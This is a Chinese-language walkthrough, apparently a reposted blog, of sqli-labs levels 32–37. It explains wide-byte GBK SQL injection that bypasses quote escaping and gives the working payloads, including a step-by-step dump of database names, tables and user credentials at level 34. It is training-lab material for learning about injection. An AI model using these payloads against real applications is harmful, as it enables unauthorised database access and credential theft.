开通会员
这六关都是关于宽字节注入的,分为GET/POST型,其实都一样,只不过POST要用一下burp
原理
mysql在使用GBK编码的时候,会认为两个字符为一个汉字,例如%aa%5c就是一个汉字(前一个ascii码大于128才能到汉字的范围)。我们在过滤 ' 的时候,往往利用的思路是将 ' 转换为 ' (转换的函数可以自定义,也可以用PHP自带函数)。
因此我们在此想办法将 ' 前面添加的除掉,一般有两种思路:
1.%df吃掉具体的原因是urlencode(') = %5c%27,我们在%5c%27前面添加%df,形成%df%5c%27,而上面提到的mysql在GBK编码方式的时候会将两个字节当做一个汉字,此时%df%5c就是一个汉字,%27则作为一个单独的符号在外面,同时也就达到了我们的目的。
2.将'中的过滤掉,例如可以构造 %**%5c%5c%27的情况,后面的%5c会被前面的%5c给注释掉。这也是bypass的一种方法。
less-32
http://127.0.0.1/sqli-labs/Less-32/?id=-1%E6' union select 1,2,database() --+
less-33
http://127.0.0.1/sqli-labs/Less-33/?id=-1%E6' union select 1,2,database() --+
less-34
1、先判断闭合方式
(1)、输入uname=admin'&passwd=123456&submit=Submit
发现后台为单引号加了一个反斜杠来转义单引号。
(2)输入 uname=admin%aa'&passwd=123456&submit=Submit
根据错误回显和提示,可以判断闭合方式,并且构造出闭合语句uname=111%aa'#&passwd=111&submit=Submit
2、判断列数
(1)输入uname=admin%aa' order by 2#&passwd=aaaaaa&submit=Submit
正常显示。
(2)输入uname=admin%aa' order by 3#&passwd=aaaaaa&submit=Submit
报错,所以列数为两列
3、爆破
(1)查看显示位
uname=admin%aa' union select 1,2#&passwd=aaaaaa&submit=Submit
(2)爆库
uname=admin%aa' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=aaaaaa&submit=Submit
(3)爆表
uname=admin%aa' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=aaaaaa&submit=Submit
(4)爆列
因为后台代码会转义单引号,所以在爆列语句中使用十六进制来表示表名
users的十六进制:0x7573657273 security的十六进制:0x7365637572697479
(5)爆数据
uname=admin%aa' union select group_concat(username),group_concat(password) from users#&passwd=aaaaaa&submit=Submit
less-35
http://127.0.0.1/sqli-labs/Less-35/?id=-1 union select 1,version(),database()--+
less-36
http://127.0.0.1/sqli-labs/Less-36/?id=-1%E6' union select 1,2,database()--+
less-37
和34关一样,不再赘述
本文摘自 :https://www.cnblogs.com/